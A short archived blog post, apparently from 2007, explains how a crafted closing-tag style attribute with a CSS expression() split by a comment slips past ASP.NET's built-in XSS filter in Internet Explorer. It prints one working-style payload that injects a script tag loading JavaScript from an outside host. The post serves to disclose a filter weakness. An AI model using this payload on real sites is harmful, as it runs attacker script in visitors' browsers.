--- layout: post status: publish published: true title: Bypass ASP.NET XSS Protection in Internet Explorer wordpress_id: 290 wordpress_url: http://pro.grammatic.org/post-bypass-aspnet-xss-protection-in-internet-explorer-8.aspx date: !binary |- MjAwNy0wNS0xNSAxNDowMzoyNCArMDIwMA== date_gmt: !binary |- MjAwNy0wNS0xNSAxNDowMzoyNCArMDIwMA== categories: - Technology - InfoSec - .NET tags: - information security - .NET comments: [] --- <p>ASP.NET comes preloaded with some default XSS protection which is actually pretty nifty. However, it turns out that the system can be circumvented by a variety of methods, as illustrated by this test input:</p> {% highlight html %} </a style="xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://www.site.com/JS.js')"> {% endhighlight %} <p>Turns out that IE will still process attributes on closing tags which circumvents the filter for <a whilst also treating /**/ as a null comment but obviously breaking .NET's filter regex. Thanks to Hong @ <a href="http://sla.ckers.org/forum/read.php?2,7462,8409%23msg-8409">sla.ckers</a>.</p>